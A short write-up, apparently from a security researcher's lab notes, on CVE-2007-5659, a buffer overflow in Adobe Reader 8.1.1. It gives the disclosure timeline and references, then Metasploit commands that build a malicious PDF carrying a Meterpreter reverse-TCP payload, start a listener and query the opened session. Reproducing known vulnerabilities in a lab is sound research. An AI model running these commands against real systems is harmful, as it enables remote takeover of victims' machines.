Timeline :

Vulnerability reported by Greg MacManus to IDefense Labs
Vulnerability reported from IDefense Labs to the vendor the 2007-10-10
Adobe release version 8.1.2 the 2008-02-06
Exploit discovered in the wild the 2008-02-08
Public disclosure the 2008-02-08
Metasploit PoC provided by MC the 2009-03-28

    PoC provided by :

MC
Didier Stevens

    Reference(s) :

CVE-2007-5659
EDB-ID-11987

    Affected version(s) :

Adobe Reader and Adobe Acrobat Professional 8.1.1

    Tested on Windows XP SP3 with :

    Adobe Reader 8.1.1

    Description :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_collect­emailinfo
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig